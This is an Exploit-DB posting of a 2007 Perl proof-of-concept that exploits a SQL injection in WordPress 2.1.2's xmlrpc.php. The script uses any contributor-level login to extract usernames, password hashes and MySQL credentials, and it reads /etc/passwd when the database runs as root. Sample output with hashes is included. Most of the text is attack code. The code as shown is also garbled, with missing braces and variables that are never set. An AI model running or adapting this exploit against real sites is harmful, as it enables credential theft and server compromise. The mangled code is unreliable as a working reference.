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exploitdbSumit SiddharthEDB-ID:3656
HistoryApr 03, 2007 - 12:00 a.m.

WordPress Core 2.1.2 - 'xmlrpc' SQL Injection

Sumit Siddharth

AI Score




#!/usr/bin/perl -w

#Wordpress 2.1.2 SQL Injection POC
#Credits: [email protected]
#Thanks to ferruh ([email protected])for improving my exploitation skills

#Wordpress version 2.1.2 is vulnerable to sql injection. This POC works when exploting with the credentials of a valid user. The user can belong to 'contributor' role or any higher role. Versions before 2.1.2 have not been tested but are most likely to be vulnerable as well. 

#C:\" author author 5
# The usage is correct
#[*] Trying Host ...
#[+] The xmlrpc-2-2 server seems to be working
#Username for id = 1 is:--> admin
#Md5 hash for user: admin
#is: 21232f297a57a5a743894a0e4a801fc3
#Username for id = 2 is:--> contri
#Md5 hash for user: contri
#is: 95a178dde9d3fa2bde4971f10d3acc3e
#Username for id = 3 is:--> author
#Md5 hash for user: author
#is: 02bd92faa38aaa6cc0ea75e59937a1ef
#Total Number of Users found:-->3
#Mysql is running as:  root@localhost
#Encrypted password for: root@localhost
# is: root@localhost67457e226a1a15bd
#This deserves no mercy.... Lets get the /etc/passwd
#.......imho...Here is the /etc/passwd file:
#list:x:38:38:Mailing List Manager:/var/list:/bin/sh
#gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
#postgres:x:101:105:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
#haldaemon:x:103:109:Hardware abstraction layer,,,:/home/haldaemon:/bin/false
#gdm:x:104:112:Gnome Display Manager:/var/lib/gdm:/bin/false
#mysql:x:105:113:MySQL Server,,,:/var/lib/mysql:/bin/false
#snort:x:107:115:Snort IDS:/var/log/snort:/bin/false
#arpwatch:x:111:120:ARP Watcher,,,:/var/lib/arpwatch:/bin/sh
#use warnings;
use LWP::UserAgent;
my $ua = new LWP::UserAgent;
$ua->agent("Wordpress Hash Grabber v2.0" . $ua->agent);

my $host = $ARGV[0]; # The path to xmlrpc.php
my $username= $ARGV[1];#username <any role>
my $password= $ARGV[2];#password <any role>
my $postid=  $ARGV[3];#post id which the user can edit
my $pref = 'wp_';    # database prefix!
my $hash_pass="";

#$root='[email protected]';

if (@ARGV < 4)
print " -----------------------------------------------------------------------\n";
print " - Wordpress xmlrpc.php 'post_id' sql injection exploit\n Version 2.1.2";
print " by NotSoSecure // \n";
print " coded by sid //sid\  // 31.03.2007\n";
print " ------------------------------------------------------------------------\n";
print " Usage:\n";
print " <host> <username> <password> <post_id>\n";
print "\n";
print " <host> - host for attack\n full path eg.";
print " <username> - valid username, can be in any of these role: contributor, author, editor \n";
print " <password> - valid password for the user\n";
print " <post_id> - valid post_id which the user can edit\n";
print " ------------------------------------------------------------------------\n";

print "\n The usage is correct\n[*] Trying Host $host ...\n";

my $res = $ua->get($host.'/xmlrpc.php');

if ( $res->content =~ /XML-RPC server accepts POST requests only/is )
       print "[+] The xmlrpc server seems to be working \n";
	print "--------------------\n";
       print "[error]--> Something seems to be wrong with the xmlrpc.php \nCheck the full path to xmlrpc.php again\n ";
       # Sloppy way of debugging, remove if you want
       open(LOG, ">wp_out.html"); print LOG $res->content;

for ($i=1; $i<=100 ;$i++)

#bug: if a user has been deleted the corresponding id will be missing.
#change this to point to the known ids or the usernames, or just make it go for top 100 ids

							   #obtaining usernames and userid
							   my $sql = "<?xml version=\"1.0\"?><methodCall><methodName>mt.setPostCategories</methodName>   <params>   <param><value><string>".$postid." union all select user_login from wp_users where id=".$i."</string></value>   </param>   <param><value><string>".$username."</string></value>   </param>   <param><value><string>".$password."</string></value>   </param>   <param><value>  <array>    <data><value>  <struct>    <member>      <name>categoryId</name>      <value><string>1</string></value>    </member>    <member>      <name>categoryName</name>      <value><string>Uncategorized</string></value>    </member>    <member>      <name>isPrimary</name>      <value><boolean>0</boolean></value>    </member>  </struct></value>  </data></array></value>   </param>   </params></methodCall>";
                               my $req = new HTTP::Request POST => $host . "/xmlrpc.php";
                                  $res = $ua->request($req);
                              $out = $res->content;

if($out=~ /Bad login\/pass combination/)
	print "--------------------\n";
	print "[error]-->Invalid username/password conbination\n";


if($out=~ /Sorry, you can not edit this post/)
	print "--------------------\n";
	print "[error]-->INVALID postid \n Supply a post id which can be edited by this user.\n";


				if ($out =~ /DELETE FROM wp_post2cat/) 

					#print "found";
					print "--------------------\n";
					@result2=split(/category_id =/,$out);
					#to do: remove the assumption that username is less than 10 char 
					 print "Username for id = ".$i." is:--> ".$final."\n";
					no warnings;
					#obtaining md5 hash for the username
							my $sql2 = "<?xml version=\"1.0\"?><methodCall><methodName>mt.setPostCategories</methodName>   <params>   <param><value><string>".$postid." union all select user_pass from wp_users where id=".$i."</string></value>   </param>   <param><value><string>".$username."</string></value>   </param>   <param><value><string>".$password."</string></value>   </param>   <param><value>  <array>    <data><value>  <struct>    <member>      <name>categoryId</name>      <value><string>1</string></value>    </member>    <member>      <name>categoryName</name>      <value><string>Uncategorized</string></value>    </member>    <member>      <name>isPrimary</name>      <value><boolean>0</boolean></value>    </member>  </struct></value>  </data></array></value>   </param>   </params></methodCall>";
                               my $req2 = new HTTP::Request POST => $host . "/xmlrpc.php";
                                  $res2 = $ua->request($req2);
                              $out2 = $res2->content;

					@result3=split(/category_id =/,$out2);
					print "Md5 hash for user: ".$final." \nis: ".$hash."\n";

						print "-----------------------\n";
						print "Total Number of Users found:-->".($i-1)."\n";

						print "-----------------------\n";
						#lets find wat the db is running as:

													my $sql2 = "<?xml version=\"1.0\"?><methodCall><methodName>mt.setPostCategories</methodName>   <params>   <param><value><string>".$postid." union all select user()</string></value>   </param>   <param><value><string>".$username."</string></value>   </param>   <param><value><string>".$password."</string></value>   </param>   <param><value>  <array>    <data><value>  <struct>    <member>      <name>categoryId</name>      <value><string>1</string></value>    </member>    <member>      <name>categoryName</name>      <value><string>Uncategorized</string></value>    </member>    <member>      <name>isPrimary</name>      <value><boolean>0</boolean></value>    </member>  </struct></value>  </data></array></value>   </param>   </params></methodCall>";
                               my $req2 = new HTTP::Request POST => $host . "/xmlrpc.php";
                                  $res2 = $ua->request($req2);
                              $out2 = $res2->content;

					@result3=split(/category_id =/,$out2);
					print "Mysql is running as:  ".$hash_user."\n";

					#lets get the password hash of the db_user for offline cracking
					#buggy code
					my $sql3 = "<?xml version=\"1.0\"?><methodCall><methodName>mt.setPostCategories</methodName>   <params>   <param><value><string>".$postid." union all select  concat(user(),mysql.user.Password) from mysql.user where user=user()</string></value>   </param>   <param><value><string>".$username."</string></value>   </param>   <param><value><string>".$password."</string></value>   </param>   <param><value>  <array>    <data><value>  <struct>    <member>      <name>categoryId</name>      <value><string>1</string></value>    </member>    <member>      <name>categoryName</name>      <value><string>Uncategorized</string></value>    </member>    <member>      <name>isPrimary</name>      <value><boolean>0</boolean></value>    </member>  </struct></value>  </data></array></value>   </param>   </params></methodCall>";
                               my $req3 = new HTTP::Request POST => $host . "/xmlrpc.php";
                                  $res3 = $ua->request($req3);
                              $out3 = $res3->content;
					my $hash_pass="";
					#print $out3;
					if ($out3=~m/SELECT command denied to user/) {
					print "Cant get the password for this user, \nPermission Denied, Thats better security!!";
										@result3=split(/category_id =/,$out3);
										print $hash_pass;
if ($hash_pass eq "") {
	print "No Password set";
					print "Encrypted password for: ".$hash_user."\n is ".$hash_pass."\n";
}				#IF database is running as root, lets rip it apart
					if ($hash_user =~m/root/) {
						print"\nThis deserves no mercy....\n Lets get the /etc/passwd\n.......imho...\n\n";

													my $sql4 = "<?xml version=\"1.0\"?><methodCall><methodName>mt.setPostCategories</methodName>   <params>   <param><value><string>".$postid." union all select load_file(0x2f6574632f706173737764)</string></value>   </param>   <param><value><string>".$username."</string></value>   </param>   <param><value><string>".$password."</string></value>   </param>   <param><value>  <array>    <data><value>  <struct>    <member>      <name>categoryId</name>      <value><string>1</string></value>    </member>    <member>      <name>categoryName</name>      <value><string>Uncategorized</string></value>    </member>    <member>      <name>isPrimary</name>      <value><boolean>0</boolean></value>    </member>  </struct></value>  </data></array></value>   </param>   </params></methodCall>";
                               my $req2 = new HTTP::Request POST => $host . "/xmlrpc.php";
                                  $res2 = $ua->request($req2);
                              $out2 = $res2->content;
					@result3=split(/category_id =/,$out2);

					print "Here is the /etc/passwd file:\n\n\n";
					print $hash;



# [2007-04-03]